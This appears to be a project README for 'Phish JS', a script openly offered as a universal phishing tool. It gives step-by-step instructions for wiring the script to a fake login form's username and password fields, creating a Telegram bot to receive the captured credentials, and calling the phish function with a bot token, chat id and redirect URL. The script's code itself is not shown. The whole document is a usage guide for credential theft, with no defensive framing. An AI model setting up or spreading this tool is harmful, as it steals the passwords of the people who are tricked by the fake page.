phish-js
phish-js copied to clipboard
:tropical_fish: Phish JS - Universal phishing script with Telegram bot notification
Phish JS
Universal phishing script + Telegram bot notification
Documentation
1. Download files or clone
2. Put "phish.min.js" file to your project
3. Import "phish.min.js"
<script src="phish.min.js"></script>
4. Import "JQuery"
Via CDN is the quickest and easiest way to get JQuery on your website.
<script src="https://code.jquery.com/jquery-3.4.1.slim.min.js" integrity="sha256-pasqAKBDmFT4eHoN2ndd6lN370kFiGUFyTiUHWhU7k8=" crossorigin="anonymous"></script>
5. Set ids to inputs and button
<input type="text" id='username'>
<input type="password" id='password'>
<button type="button" id='submit-button'>Login</button>
6. Get TOKEN and CHAT_ID
-
- Create bot with
@BotFatherand copy bot TOKEN
- Create bot with
-
- Open your bot and type
/start
- Open your bot and type
-
- Get chat id here:
https://api.telegram.org/bot<TOKEN>/getUpdates
- Get chat id here:
7. Call function
<script>
$(document).ready(function () {
const BOT_TOKEN = 'your_bot_token',
CHAT_ID = 'your_chat_id',
REDIRECT_URL = 'default_redirect_url'
phish(BOT_TOKEN, CHAT_ID, REDIRECT_URL);
});
</script>
LICENSE
Phish JS is MIT licensed.